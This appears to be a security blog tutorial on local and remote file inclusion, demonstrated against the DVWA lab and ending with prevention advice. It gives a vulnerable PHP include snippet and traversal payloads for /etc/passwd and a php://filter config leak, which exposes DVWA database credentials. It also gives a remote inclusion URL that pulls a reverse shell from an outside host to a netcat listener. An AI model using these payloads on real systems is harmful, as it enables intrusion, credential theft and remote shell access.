Hacking Applications with File Inclusion

Companies and individual software engineers are constantly developing innovative solutions to solve problems. Almost all of them are building the solution with web or mobile applications using different functionalities to make it more user-friendly. However, insecure implementation of some functions could lead to security breaches.

Today, let's talk about File Inclusion:

  • What and why this security vulnerability exist
  • How or what are the tools to exploit the vulnerability
  • Why cybercriminals have abused them, and;
  • How to prevent them from occurring in your own applications.

File Inclusion

File Inclusion is a security vulnerability in applications that allows users to read files from a file system, provide download features, search and list files, and other similar tasks.

The file inclusion can be chained or partnered with Directory Traversal.  It is a security vulnerability in applications that allows users to access directories which they should not be able to access by simply traversing the filesystem to restricted files or directories.

Local and Remote

Local File Inclusion (LFI) allows an attacker to read and execute files on the target application. It can be critical because if the web server is insecurely configured and running with high privileges, the attacker may gain access to sensitive files and information.

Remote File Inclusion (RFI) allows an attacker to execute codes from an external file you include that are not stored locally on the web server.

Exploiting Local File Inclusion (LFI)

To demonstrate this vulnerability, let's use the Damn Vulnerable Web Application (DVWA).

Here we have a link for viewing the content of a file:

http://150.136.248.103/vulnerabilities/fi/?page=file2.php

DVWA Page with File Inclusion vulnerability

The vulnerable code is:

<?php 
    $file = $_GET['page'];
    
    if(isset($file)){
        include($file);
    }
?>

The web app is getting the value of the page parameter to display its content on the page using the include() function. Changing the value from file2.php to file1.php will display the content of the file1.php file.

Combining File Inclusion with Directory Traversal

The file file2.php is currently stored at /var/www/dvwa/vulnerabilities/fi/.

Using the Directory Traversal or ../, we will traverse the directories 5x to get the content of passwd file located at /etc/ directory.

Getting the content of passwd file

The payload is http://207.182.139.53/vulnerabilities/fi/?page=../../../../../etc/passwd

Getting the Source Code

It is also possible to retrieve the source code of the file or configuration files using the php://filter wrapper.

PHP wrappers allow us to make File Inclusion far more useful. The PHP interpreter can handle many things as streams of data, such as local files, remote URL, and even remote SSH systems.

The Payload is http://150.136.248.103/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=../../config/config.inc.php

Getting the content of config file

The result of the payload is encoded in Base64 format due to the wrapper we used.

PD9waHANCg0KIyBJZiB5b3UgYXJlIGhhdmluZyBwcm9ibGVtcyBjb25uZWN0aW5nIHRvIHRoZSBNeVNRTCBkYXRhYmFzZSBhbmQgYWxsIG9mIHRoZSB2YXJpYWJsZXMgYmVsb3cgYXJlIGNvcnJlY3QNCiMgdHJ5IGNoYW5naW5nIHRoZSAnZGJfc2VydmVyJyB2YXJpYWJsZSBmcm9tIGxvY2FsaG9zdCB0byAxMjcuMC4wLjEuIEZpeGVzIGEgcHJvYmxlbSBkdWUgdG8gc29ja2V0cy4NCiMgICBUaGFua3MgdG8gQGRpZ2luaW5qYSBmb3IgdGhlIGZpeC4NCg0KIyBEYXRhYmFzZSBtYW5hZ2VtZW50IHN5c3RlbSB0byB1c2UNCiREQk1TID0gJ015U1FMJzsNCiMkREJNUyA9ICdQR1NRTCc7IC8vIEN1cnJlbnRseSBkaXNhYmxlZA0KDQojIERhdGFiYXNlIHZhcmlhYmxlcw0KIyAgIFdBUk5JTkc6IFRoZSBkYXRhYmFzZSBzcGVjaWZpZWQgdW5kZXIgZGJfZGF0YWJhc2UgV0lMTCBCRSBFTlRJUkVMWSBERUxFVEVEIGR1cmluZyBzZXR1cC4NCiMgICBQbGVhc2UgdXNlIGEgZGF0YWJhc2UgZGVkaWNhdGVkIHRvIERWV0EuDQokX0RWV0EgPSBhcnJheSgpOw0KJF9EVldBWyAnZGJfc2VydmVyJyBdICAgPSAnMTI3LjAuMC4xJzsNCiRfRFZXQVsgJ2RiX2RhdGFiYXNlJyBdID0gJ2R2d2EnOw0KJF9EVldBWyAnZGJfdXNlcicgXSAgICAgPSAncm9vdCc7DQokX0RWV0FbICdkYl9wYXNzd29yZCcgXSA9ICdwQHNzdzByZCc7DQoNCiMgT25seSB1c2VkIHdpdGggUG9zdGdyZVNRTC9QR1NRTCBkYXRhYmFzZSBzZWxlY3Rpb24uDQokX0RWV0FbICdkYl9wb3J0ICddID0gJzU0MzInOw0KDQojIFJlQ0FQVENIQSBzZXR0aW5ncw0KIyAgIFVzZWQgZm9yIHRoZSAnSW5zZWN1cmUgQ0FQVENIQScgbW9kdWxlDQojICAgWW91J2xsIG5lZWQgdG8gZ2VuZXJhdGUgeW91ciBvd24ga2V5cyBhdDogaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS9yZWNhcHRjaGEvYWRtaW4vY3JlYXRlDQokX0RWV0FbICdyZWNhcHRjaGFfcHVibGljX2tleScgXSAgPSAnJzsNCiRfRFZXQVsgJ3JlY2FwdGNoYV9wcml2YXRlX2tleScgXSA9ICcnOw0KDQojIERlZmF1bHQgc2VjdXJpdHkgbGV2ZWwNCiMgICBEZWZhdWx0IHZhbHVlIGZvciB0aGUgc2VjdWlydHkgbGV2ZWwgd2l0aCBlYWNoIHNlc3Npb24uDQojICAgVGhlIGRlZmF1bHQgaXMgJ2ltcG9zc2libGUnLiBZb3UgbWF5IHdpc2ggdG8gc2V0IHRoaXMgdG8gZWl0aGVyICdsb3cnLCAnbWVkaXVtJywgJ2hpZ2gnIG9yIGltcG9zc2libGUnLg0KJF9EVldBWyAnZGVmYXVsdF9zZWN1cml0eV9sZXZlbCcgXSA9ICdpbXBvc3NpYmxlJzsNCg0KIyBEZWZhdWx0IFBIUElEUyBzdGF0dXMNCiMgICBQSFBJRFMgc3RhdHVzIHdpdGggZWFjaCBzZXNzaW9uLg0KIyAgIFRoZSBkZWZhdWx0IGlzICdkaXNhYmxlZCcuIFlvdSBjYW4gc2V0IHRoaXMgdG8gYmUgZWl0aGVyICdlbmFibGVkJyBvciAnZGlzYWJsZWQnLg0KJF9EVldBWyAnZGVmYXVsdF9waHBpZHNfbGV2ZWwnIF0gPSAnZGlzYWJsZWQnOw0KDQojIFZlcmJvc2UgUEhQSURTIG1lc3NhZ2VzDQojICAgRW5hYmxpbmcgdGhpcyB3aWxsIHNob3cgd2h5IHRoZSBXQUYgYmxvY2tlZCB0aGUgcmVxdWVzdCBvbiB0aGUgYmxvY2tlZCByZXF1ZXN0Lg0KIyAgIFRoZSBkZWZhdWx0IGlzICdkaXNhYmxlZCcuIFlvdSBjYW4gc2V0IHRoaXMgdG8gYmUgZWl0aGVyICd0cnVlJyBvciAnZmFsc2UnLg0KJF9EVldBWyAnZGVmYXVsdF9waHBpZHNfdmVyYm9zZScgXSA9ICdmYWxzZSc7DQoNCj8

Decoding it to Base64 will give us the following readable source code:

#I removed other unnecessary texts
<?php

$DBMS = 'MySQL';

$_DVWA = array();
$_DVWA[ 'db_server' ]   = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ]     = 'root';
$_DVWA[ 'db_password' ] = 'p@ssw0rd';
$_DVWA[ 'db_port '] = '5432';

$_DVWA[ 'recaptcha_public_key' ]  = '';
$_DVWA[ 'recaptcha_private_key' ] = '';


$_DVWA[ 'default_security_level' ] = 'low';

$_DVWA[ 'default_phpids_level' ] = 'disabled';

$_DVWA[ 'default_phpids_verbose' ] = 'false';

?>

Exploiting Remote File Inclusion (RFI)

We'll be using the same target website and we will use an external website to demonstrate the vulnerability.

The Payload is http://150.136.248.103/vulnerabilities/fi/?page=http://hackmonga.com/test.php

Remote File Inclusion

The http://hackmonga.com/test.php is an external website and the content of the test.php file is <?php phpinfo(); ?>.

The payload above will display the PHP Information which is very sensitive for a web application.

Spawning a System Shell

Using Remote File Inclusion vulnerability, it is possible to spawn a shell using an external malicious file.

I used pentestmonkey's shell file and changed the value of $ip and $port my own IP and Port using ngrok.

Ngrok is a free tool that allows us to tunnel from a public URL to our application running locally.

The payload is http://207.182.139.53/vulnerabilities/fi/?page=http://hackmonga.com/shell.php

I set up my netcat listener and once I visited the link above, I will automatically get a feedback and the shell will spawn.

Spawning a Shell

Bypasses and Techniques in Exploiting File Inclusion

All the bypasses and techniques can be found on the PayloadsAllTheThings GitHub repository.

For LFI, you may use different wrappers such as:

File Inclusion Tools

The Impact in Confidentiality, Integrity, and Availability (CIA)

The attacker may be able to retrieve and read the contents of files and expose sensitive data.

It may be possible as well to modify the files in the server if the attacker manages to spawn a shell to access the system.

Availability can also be affected if the attacker specifies a filename for a large file, or points to a special device or a file that does not have the format that the application expects leading to Denial of Service.

Preventing File Inclusion

  • Assume all input is malicious
    The most effective way to prevent this kind of attack is to perform input validation.
  • Check both sides
    Most defenses are being implemented on the client side only, but I highly recommend implementing the defense on the server side as well in order to avoid Client-Side Enforcement of Server-Side Security.
  • Use an Application Firewall
    Use an application firewall that can detect attacks against this vulnerability. It is a good addition to your security defenses.
  • Limit Privileges
    Run your application using the lowest privileges required to perform the necessary tasks. Create an isolated account with limited privileges if possible, that are only used for a single task. In this way, a successful attack will not immediately give the attacker access to the rest of the functionality - for example, deleting and changing files on the server.
  • Configure PHP
    If you are using PHP, set allow_url_fopen and allow_url_include to false. This limits the ability to include files from local and remote locations.

Secuna is a trusted cybersecurity testing platform that provides organizations a robust and secure platform that enables them to collaborate with the top security researchers from around the world to find and address security vulnerabilities.

Blog Post Photo from Christoph Bouvier